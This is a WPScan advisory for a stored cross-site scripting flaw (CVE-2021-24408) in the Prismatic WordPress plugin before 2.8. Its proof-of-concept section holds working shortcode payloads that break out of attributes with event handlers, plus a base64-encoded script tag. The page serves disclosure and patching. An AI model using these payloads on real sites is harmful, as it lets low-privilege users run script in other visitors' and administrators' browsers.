WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact
WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Prismatic < 2.8 - Contributor+ Stored XSS

Description

The plugin does not sanitise or validate some of its shortcode parameters, allowing users with a role as low as Contributor to set Cross-Site payload in them. A post made by a contributor would still have to be approved by an admin to have the XSS trigger able in the frontend, however, higher privilege users, such as editor could exploit this without the need of approval, and even when the blog disallows the unfiltered_html capability.

Injection Points:
1) prismatic_code shortcode's "class" attribute
2) prismatic_encoded shortcode-like syntax with HTML attributes nested inside prismatic_code shortcode
3) Base-64ed payload inside prismatic_encoded shortcode-like syntax nested inside prismatic_code shortcode

Proof of Concept

This contains three XSS (all injected at different locations).

[prismatic_code class='hello" style="animation-name:twentytwentyone-close-button-transition;" onanimationstart="alert(1)']
[prismatic_encoded style=%%animation-name:twentytwentyone-close-button-transition;%% onanimationstart=%%alert(2)%%]PHNjcmlwdD5hbGVydChvcmlnaW4pPC9zY3JpcHQ+[/prismatic_encoded]
[/prismatic_code]


The first two payloads via the animation-name/onanimationstart are specific to the Twenty Twenty-One theme (and will be triggered w/o user interaction other than accessing the page)

To try with another theme (requires the user to click on the generated elements in the page to trigger the first two XSS):
[prismatic_code class='hello" onclick="alert(1)']
[prismatic_encoded onclick=%%alert(2)%%]PHNjcmlwdD5hbGVydChvcmlnaW4pPC9zY3JpcHQ+[/prismatic_encoded]
[/prismatic_code]


PHNjcmlwdD5hbGVydChvcmlnaW4pPC9zY3JpcHQ+ = base64("<script>alert(origin)</script>") 

Affects Plugins

prismatic
Fixed in version 2.8

References

CVE
CVE-2021-24408

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID
51855853-e7bd-425f-802c-824209f4f84d

Timeline

Publicly Published

2021-06-21 (about 1 years ago)

Added

2021-06-21 (about 1 years ago)

Last Updated

2021-06-25 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin
WPScan

Vulnerabilities

WordPressPluginsThemesOur StatsSubmit vulnerabilities

About

How it worksPricingWordPress pluginNewsContact

For Developers

StatusAPI detailsCLI scanner

Other

PrivacyTerms of serviceSubmission termsDisclosure policyPrivacy Notice for California Users
jetpackIn partnership with Jetpack
githubtwitterfacebook
Angithubendeavor
Work With Us